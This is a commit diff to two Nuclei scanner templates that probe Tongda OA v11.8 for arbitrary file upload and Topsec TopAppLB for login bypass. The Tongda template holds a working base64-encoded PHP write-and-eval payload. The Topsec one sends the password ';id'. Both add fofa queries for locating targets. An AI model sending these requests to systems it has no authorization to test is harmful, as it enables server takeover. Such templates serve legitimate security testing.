Updated
pussycat0x
parent
0aab17e06c
commit
33bf8b7cb2
|
|
@ -1,12 +1,17 @@
|
|||
id: tongda-oa-api-ali-arbitrary-file-upload
|
||||
id: tongda-api-arbitrary-file-upload
|
||||
|
||||
info:
|
||||
name: tongda-oa-api-ali-arbitrary-file-upload
|
||||
name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
|
||||
author: SleepingBag945
|
||||
severity: critical
|
||||
description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
|
||||
description: |
|
||||
Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
|
||||
reference:
|
||||
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html
|
||||
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
|
||||
metadata:
|
||||
max-request: 1
|
||||
fofa-query: app="TDXK-通达OA"
|
||||
verified: true
|
||||
tags: tongda,oa
|
||||
|
||||
http:
|
||||
|
|
@ -18,7 +23,7 @@ http:
|
|||
Accept-Encoding: gzip
|
||||
|
||||
--502f67681799b07e5de6b503655f5cae
|
||||
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
|
||||
|
|
@ -30,16 +35,13 @@ http:
|
|||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- |
|
||||
GET /fb6790f4.php HTTP/1.1
|
||||
GET /{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
|
||||
# req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 200'
|
||||
- 'status_code_2 == 200 && contains(body_2,"OK")'
|
||||
- 'status_code_3 == 200 && contains(body_3,"phpinfo")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
|
||||
- 'contains(body_2,"OK") && contains(body_3,"phpinfo")'
|
||||
condition: and
|
||||
|
|
@ -1,12 +1,17 @@
|
|||
id: topsec-topapplb-arbitrary-user-login
|
||||
id: topsec-topapplb-arbitrary-login
|
||||
|
||||
info:
|
||||
name: Topsec TopAppLB Any account Login
|
||||
name: Topsec TopAppLB Any account Login - Arbitrary Login
|
||||
author: SleepingBag945
|
||||
severity: critical
|
||||
severity: high
|
||||
description: |
|
||||
Any Account can log in to the background
|
||||
tags: defaultaccount
|
||||
Any Account can log in to the background.Enter any account on the login page, the password is ;id
|
||||
reference:
|
||||
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
|
||||
metadata:
|
||||
max-request: 1
|
||||
fofa-query: title="TopApp-LB 负载均衡系统"
|
||||
tags: topsec,topapplb,misconfig
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
|
@ -14,7 +19,6 @@ http:
|
|||
POST /login_check.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
|
|
@ -25,9 +29,8 @@ http:
|
|||
|
||||
userName=admin&password=%3Bid
|
||||
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 302 && contains(header_1,"redirect.php")'
|
||||
condition: and
|
||||
condition: and
|
||||
Loading…
Reference in New Issue